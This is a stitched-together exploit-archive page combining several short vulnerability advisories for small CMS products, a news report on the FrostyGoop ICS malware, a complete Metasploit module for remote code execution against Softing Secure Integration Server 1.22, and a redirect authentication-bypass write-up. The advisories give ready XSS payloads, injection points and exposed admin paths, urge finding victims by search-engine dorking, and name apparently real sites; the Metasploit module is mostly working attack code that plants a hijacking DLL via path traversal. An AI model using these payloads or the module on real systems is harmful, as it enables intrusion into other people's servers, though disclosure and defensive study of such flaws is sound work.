PHP MaXiMuS version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP MaXiMuS v2.5.2 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://php-maximus.fr/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

PHP MaXiMuS 2.5.2 Cross Site Scripting

NUKE SENTINEL version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : NUKE SENTINEL v2.5.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.ravenphpscripts.com/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

NUKE SENTINEL 2.5.2 Cross Site Scripting

Minfotech CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Minfotech CMS v2.0 Sql injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://minfotech.in/AboutUs                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /project_list?name=stretch_films <===== inject here[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films[+] Login : /admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Minfotech CMS 2.0 SQL Injection

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

eDesign CMS 2.0 Insecure Direct Object Reference

Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January.
Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP

ICS Malware / Critical Infrastructure

Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January.

Industrial cybersecurity firm Dragos has dubbed the malware **FrostyGoop**, describing it as the first malware strain to directly use Modbus TCP communications to sabotage operational technology (OT) networks. It was discovered by the company in April 2024.

"FrostyGoop is an ICS-specific malware written in Golang that can interact directly with Industrial Control Systems (ICS) using Modbus TCP over port 502," researchers Kyle O'Meara, Magpie (Mark) Graham, and Carolyn Ahlers said in a technical report shared with The Hacker News.

It's believed that the malware, mainly designed to target Windows systems, has been used to target ENCO controllers with TCP port 502 exposed to the internet. It has not been tied to any previously identified threat actor or activity cluster.

FrostyGoop comes with capabilities to read and write to an ICS device holding registers containing inputs, outputs, and configuration data. It also accepts optional command line execution arguments, uses JSON-formatted configuration files to specify target IP addresses and Modbus commands, and logs output to a console and/or a JSON file.

The incident targeting the municipal district energy company is said to have resulted in a loss of heating services to more than 600 apartment buildings for almost 48 hours.

"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions," the researchers said in a conference call, noting initial access was likely gained by exploiting a vulnerability in Mikrotik routers in April 2023.

"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions. Remediation took almost two days."

While FrostyGoop extensively employs the Modbus protocol for client/server communications, it's far from the only one. In 2022, Dragos and Mandiant detailed another ICS malware named PIPEDREAM (aka INCONTROLLER) that leveraged various industrial network protocols such as OPC UA, Modbus, and CODESYS for interaction.

It's also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY.

The malware's ability to read or modify data on ICS devices using Modbus has severe consequences for industrial operations and public safety, Dragos said, adding more than 46,000 internet-exposed ICS appliances communicate over the widely-used protocol.

"The specific targeting of ICS using Modbus TCP over port 502 and the potential to interact directly with various ICS devices pose a serious threat to critical infrastructure across multiple sectors," the researchers said.

"Organizations must prioritize the implementation of comprehensive cybersecurity frameworks to safeguard critical infrastructure from similar threats in the future."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New ICS Malware 'FrostyGoop' Targeting Critical Infrastructure

This Metasploit module chains two vulnerabilities to achieve authenticated remote code execution against Softing Secure Integration Server version 1.22. In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerability when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk. In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system. The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication. A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zip'require 'metasploit/framework/login_scanner/softing_sis'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Softing Secure Integration Server v1.22 Remote Code Execution',        'Description' => %q{          This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.          In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk.          In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.          The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.          A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.        },        'License' => MSF_LICENSE,        'Author' => [          'Chris Anastasio (muffin) of Incite Team', # discovery          'Steven Seeley (mr_me) of Incite Team', # discovery          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>', # msf module        ],        'References' => [          ['CVE', '2022-1373'],          ['CVE', '2022-2334'],          ['ZDI', '22-1154'],          ['ZDI', '22-1156'],          ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],          ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']        ],        'DefaultOptions' => {          'RPORT' => 8099,          'SSL' => false,          'EXITFUNC' => 'thread',          'WfsDelay' => 300        },        'Platform' => 'win',        # the software itself only supports x64, see        # https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html        'Arch' => [ARCH_X64],        'Targets' => [          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-07-27',        'Privileged' => true,        'Compat' => {          'Meterpreter' => {            'Commands' => %w[              stdapi_fs_delete_file            ]          }        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('SIGNATURE', [false, 'Use a username/signature pair instead of username/password pair to authenticate']),        OptString.new('USERNAME', [false, 'The username to specify for authentication.', 'admin']),        OptString.new('PASSWORD', [false, 'The password to specify for authentication', 'admin']),        OptString.new('DLLPATH', [false, 'Custom compiled DLL to use'])      ]    )    self.needs_cleanup = true  end  # this will be updated with the signature from "check"  @signature = nil  # create a checker instance to reuse code from the Softing SIS login bruteforce module  def checker_instance    Metasploit::Framework::LoginScanner::SoftingSIS.new(      configure_http_login_scanner(        host: datastore['RHOSTS'],        port: datastore['RPORT'],        connection_timeout: 5      )    ).dup  end  # check if the generated/provided signature is valid for the specified user  def signature_check(user, signature)    send_request_cgi({      'method' => 'GET',      'uri' => "/runtime/core/user/#{user}/authentication",      'vars_get' => {        'User' => user,        'Signature' => signature      }    })  end  def check    # check the Softing SIS version    softing_version_res = checker_instance.check_setup    unless softing_version_res      return CheckCode::Unknown    end    softing_version = Rex::Version.new(softing_version_res)    print_status("#{peer} - Found Softing Secure Integration Server #{softing_version}")    # the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory    # so we will not continue if the version is not vulnerable    unless softing_version < Rex::Version.new('1.30')      return CheckCode::Safe    end    # if the operator provides a signature, then use that instead of the username and password    if datastore['SIGNATURE']      print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...")      # send a GET request to /runtime/core/user/<username>/authentication      signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE'])      # if we cannot connect at this point, we only know that the version is < 1.30      # the system "appears" to be vulnerable      unless signature_check_res        print_error("#{peer} - Connection failed!")      end      # if the signature is correct, 200 OK is returned      if signature_check_res.code == 200        print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}")        @signature = datastore['SIGNATURE']      else        print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")      end    # login with username and password    else      # get the authentication token      auth_token = checker_instance.get_auth_token(datastore['USERNAME'])      # generate the signature      @signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD'])      # check the generated signatures' validity      signature_check_res = signature_check(datastore['USERNAME'], @signature)      # if we cannot connect, then the system "appears" to be vulnerable      unless signature_check_res        print_error("#{peer} - Connection failed!")      end      # if the signature is correct, 200 OK is returned      if signature_check_res.code == 200        print_good("#{peer} - Valid credentials provided")      else        print_error("#{peer} - Invalid credentials!")      end    end    # if the version is less than 1.30 it's supposedly vulnerable    # but there is no way to confirm vulnerability existence without actually exploiting    # so instead of "Vulnerable", return "Appears"    CheckCode::Appears  end  def exploit    # did the operator specify a custom DLL? If not...    if datastore['DLLPATH']      # otherwise, just use their provided DLL and assume they compiled everything correctly      # there is no way to check if it's compiled correctly anyway      dll_path = datastore['DLLPATH']    else      # have MSF create the malicious DLL      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')      datastore['EXE::Path'] = path      datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')      print_status('Generating payload DLL...')      dll = generate_payload_dll      dll_name = 'wbemcomn.dll'      dll_path = store_file(dll, dll_name)      print_status("Created #{dll_path}")    end    # backup the Softing SIS configuration    print_status("#{peer} - Saving configuration...")    get_config_zip_res = send_request_cgi({      'method' => 'GET',      'uri' => '/runtime/core/config-download',      'vars_get' => {        'User' => datastore['USERNAME'],        'Signature' => @signature      }    })    # end if we cannot get the configuration for some reason    unless get_config_zip_res      fail_with Failure::Unreachable, "#{peer} - Could not obtain configuration"    end    # status code 200 is the expected response to getting the configuration ZIP    unless get_config_zip_res.code == 200      # for verbosity, save the JSON response      get_config_zip_res_json = get_config_zip_res.get_json_document      vprint_error("#{peer} - #{get_config_zip_res_json}")      fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{get_config_zip_res.code}, could not obtain configuration"    end    # if successful, the body cnotains the configuration ZIP    config_zip = get_config_zip_res.body    # config_download.zip is the name of the configuration ZIP when downloading from the browser    # append a hash based on the peer address to prevent overwriting the config file if there are multiple targets    config_zip_name = "config_download_#{Digest::MD5.hexdigest(peer)}.zip"    # store the config zip file    config_zip_path = store_file(config_zip, config_zip_name)    print_status("Saved configuration to #{config_zip_path}")    # insert the malicious DLL    Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile|      zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path)    end    # restore the configuration    restore_config_res = send_request_cgi({      'method' => 'PUT',      'uri' => '/runtime/core/config-restore',      'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}",      'vars_get' => {        'User' => datastore['USERNAME'],        'Signature' => @signature      },      'data' => File.read(config_zip_path)    })    # no response    unless restore_config_res      fail_with Failure::Unreachable, "#{peer} - Could not restore configuration!"    end    # bad response    unless restore_config_res.code == 200      # for verbosity, show the JSON response      restore_config_res_json = restore_config_res.get_json_document      vprint_error("#{peer} - #{restore_config_res_json}")      fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!"    end  end  # clean up the planted DLL if the session is meterpreter  def on_new_session(session)    super    unless file_dropper_delete_file(session, 'C:\\Windows\\System32\\wbem\\wbemcomn.dll')      # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup      register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')    end  end  # Store the file in the MSF local directory (/root/.msf4/local/) so it can be used when creating the ZIP file  # literal copypasta from exploits/windows/fileformat/cve_2017_8464_lnk_rce  def store_file(data, filename)    if !::File.directory?(Msf::Config.local_directory)      FileUtils.mkdir_p(Msf::Config.local_directory)    end    if filename && !filename.empty?      fname, ext = filename.split('.')    else      fname = "local_#{Time.now.utc.to_i}"    end    fname = ::File.split(fname).last    fname.gsub!(/[^a-z0-9._-]+/i, '')    fname << ".#{ext}"    path = File.join("#{Msf::Config.local_directory}/", fname)    full_path = ::File.expand_path(path)    File.open(full_path, 'wb') { |fd| fd.write(data) }    full_path.dup  endend

Softing Secure Integration Server 1.22 Remote Code Execution

Xhibiter NFT Marketplace version 1.10.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Xhibiter NFT Marketplace 1.10.2 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /search.php?id=1'%22()%26%25<acx><ScRiPt%20>prompt(915136)</ScRiPt>[+] https://www/127.0.0.1/gatesea.io/search.php?id=1'"()%26%25<acx><ScRiPt >prompt(915136)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Xhibiter NFT Marketplace 1.10.2 Cross Site Scripting

eStore CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : eStore CMS v2.0 Sql injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.2iraq.com/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

eStore CMS 2.0 SQL Injection

Clenix version 1.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Clenix v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : https://www.radiustheme.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /admin/main.php[+] https://www/127.0.0.1/otabucert.co.uk/admin/main.php[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Clenix 1.0 Insecure Direct Object Reference

Candy Redis version 2.1.2 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Tag

#windows